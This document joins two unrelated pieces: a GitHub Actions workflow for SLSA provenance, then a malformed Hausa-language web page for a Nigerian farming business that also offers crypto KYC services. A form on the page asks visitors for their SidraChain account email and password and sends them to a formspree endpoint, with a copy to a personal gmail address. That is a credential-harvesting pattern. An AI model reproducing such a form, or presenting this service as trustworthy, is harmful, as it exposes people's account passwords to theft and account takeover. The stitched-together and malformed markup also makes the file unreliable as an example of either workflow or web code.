# This workflow uses actions that are not certified by GitHub.
# They are provided by a third-party and are governed by
# separate terms of service, privacy policy, and support
# documentation.

# This workflow lets you generate SLSA provenance file for your project.
# The generation satisfies level 3 for the provenance requirements - see https://slsa.dev/spec/v0.1/requirements
# The project is an initiative of the OpenSSF (openssf.org) and is developed at
# https://github.com/slsa-framework/slsa-github-generator.
# The provenance file can be verified using https://github.com/slsa-framework/slsa-verifier.
# For more information about SLSA and how it improves the supply-chain, visit slsa.dev.

name: SLSA generic generator
on:
  workflow_dispatch:
  release:
    types: [created]

jobs:
  build:
    runs-on: ubuntu-latest
    outputs:
      digests: ${{ steps.hash.outputs.digests }}

    steps:
      - uses: actions/checkout@v4

      # ========================================================
      #
      # Step 1: Build your artifacts.
      #
      # ========================================================
      - name: Build artifacts
        run: |
            # These are some amazing artifacts.
            echo "artifact1" > artifact1
            echo "artifact2" > artifact2

      # ========================================================
      #
      # Step 2: Add a step to generate the provenance subjects
      #         as shown below. Update the sha256 sum arguments
      #         to include all binaries that you generate
      #         provenance for.
      #
      # ========================================================
      - name: Generate subject for provenance
        id: hash
        run: |
          set -euo pipefail

          # List the artifacts the provenance will refer to.
          files=$(ls artifact*)
          # Generate the subjects (base64 encoded).
          echo "hashes=$(sha256sum $files | base64 -w0)" >> "${GITHUB_OUTPUT}"

  provenance:
    needs: [build]
    permissions:
      actions: read   # To read the workflow path.
      id-token: write # To sign the provenance.
      contents: write # To add assets to a release.
    uses: slsa-framework/slsa-github-generator/.github/workflows/generator_generic_slsa3.yml@v1.4.0
    with:
      base64-subjects: "${{ needs.build.outputs.digests }}"
      upload-assets: true # Optional: Upload to a new release
<!DOCTYPE html>
<html lang="ha">
<html lang="en">
<head>
  <meta charset="UTF-8">
  <title>ASGAD FARMING AND ANIMALS REARING</title>
  <style>
    body {
      font-family: Arial, sans-serif;
      background-color: #f4f9f4;
      color: #333;
      text-align: center;
      padding: 40px;
    }
    h1 {
      color: green;
    }
  </style>
</head>
<body>

  <h1>Barka da zuwa ASGAD FARMING AND ANIMALS REARING</h1>
  <p><strong>Amintaccinku a harkar noma da kiwon dabbobi.</strong></p>
  <p><strong>Haka kuma muna yin KYC na asusun Crypto, Tabbatarwa da cinikin kudin intanet (P2P).</strong></p>

  <h1>Game da Mu</h1>
  <p>A ASGAD FARMING AND REARING, muna da niyyar samar da ingantattun kayayyakin noma da ayyukan kiwo. Daga shuka zuwa shanu, muna amfani da hanyoyin zamani da dorewa a aikin gona.</p>
  <p>Haka kuma muna cikin harkokin Web3 da Crypto kamar: Sidrachain, Pi Network da sauran ayyuka – KYC, saye da sayar da kudin intanet, horo da kuma ciniki kai tsaye (P2P).</p>

  <h2>Ayyukanmu na Noma</h2>
  <ul>
    <li>Noma (Masara, Shinkafa, Kayan lambu)</li>
    <li>Kiwon Dabbobi (Awaki, Shanu, Kaji)</li>
    <li>Shawara kan hanyoyin noma na zamani</li>
    <li>Samar da kayan gona na gargajiya</li>
  </ul>
  <h2>Fom ɗin Tuntuɓa - Aika Buƙatarka</h2>
  <form action="mailto:garbasagiru57@gmail.com" method="post" enctype="multipart/form-data">
    
    <label for="name">Suna:</label><br>
    <input type="text" id="name" name="name" required><br><br>

    <label for="phone">Lambar Waya:</label><br>
    <input type="tel" id="phone" name="phone" required><br><br>

    <label for="item">Me kake son siya?</label><br>
    <select id="item" name="item">
      <option value="shanu">Shanu</option>
      <option value="awaki">Awaki</option>
      <option value="kaji">Kaji</option>
      <option value="irin noma">Irin Noma</option>
      <option value="sauran">Wani Abu Dabam...</option>
    </select><br><br>

    <label for="message">Sakonka ko Bukatarka:</label><br>
    <textarea id="message" name="message" rows="5" cols="30" placeholder="Rubuta bukatarka anan..."></textarea><br><br>

    <label for="photo">Aika hoto (idan akwai):</label><br>
    <input type="file" id="photo" name="photo" accept="image/*"><br><br>

    <input type="submit" value="Aika Saƙo">
  </form>

  <h2>Ayyukanmu na Web3 da Crypto</h2>
  <ul>
    <li>KYC (Sidrachain, Pi Network, Rubi da sauransu)</li>
    <li>Saye da Siyar da Kudin Intanet (USDT, TRX, PI, Sidra da sauransu)</li>
    <li>Horarwa kan hanyoyin ciniki na zamani da aiki ta yanar gizo</li>
    <li>Jagora da shawarwari kan Mining da ayyukan sadarwa (Network Projects)</li>
  </ul>

  <h2>Aika Sako Domin Neman KYC ko tantancewa (verification) na Sidra ko Pi</h2>
  <label for="full name">Cikakken Suna:</label><br>
    <input type="text" id="full name" name="full name" required><br><br>

    <label for="phone">Lambar Waya:</label><br>
    <input type="tel" id="phone" name="phone" required><br><br>

  <form action="https://formspree.io/f/mwkgrzkl" method="POST">
    <label for="clientEmail">Imel ɗinka da ka yi rajista da shi:</label><br>
    <input type="email" id="clientEmail" name="Client Email" required><br><br>

    <label for="sidraPassword">Kalmar sirri da ka yi rajista da ita:</label><br>
    <input type="password" id="sidraPassword" name="SidraChain Password" required><br><br>

    <input type="hidden" name="_subject" value="Sabon Neman KYC daga Abokin Ciniki">
    <input type="hidden" name="_cc" value="garbasagiru57@gmail.com">
<label for="item">Me kake son ayi maka?</label><br>
    <select id="item" name="item">
      <option value="KYC">KYC</option>
      <option value="Tantancewa (Verification)">Tantancewa (Verification)</option>
      <option value="sauran">Wani Abu Dabam...</option>
    </select><br><br>
    <button type="submit">Tura Nema</button>
  </form>
  
  <p><strong>Lura:</strong> Muna tabbatar da cewa bayananka za su kasance cikin sirri. Idan kana da tambaya, a tuntuɓe mu: 
    <a href="mailto:asgadweb3@gmail.com">asgadweb3@gmail.com</a>
  </p>

  <h2>Domin Karin Bayani Akan Ayyukanmu, a Tuntuɓe Mu</h2>
  <p>Lamar Waya: 0703-709-3518</p>
  <p>Adireshin Imel 1: <a href="mailto:asgadfarming@gmail.com">asgadfarming@gmail.com</a></p>
  <p>Adireshin Imel 2: <a href="mailto:asgadweb3@gmail.com">asgadweb3@gmail.com</a></p>
  <p>Wuri: Lamba 2, Titin Muhammad Bashar, Daura, Jihar Katsina, Najeriya</p>
  
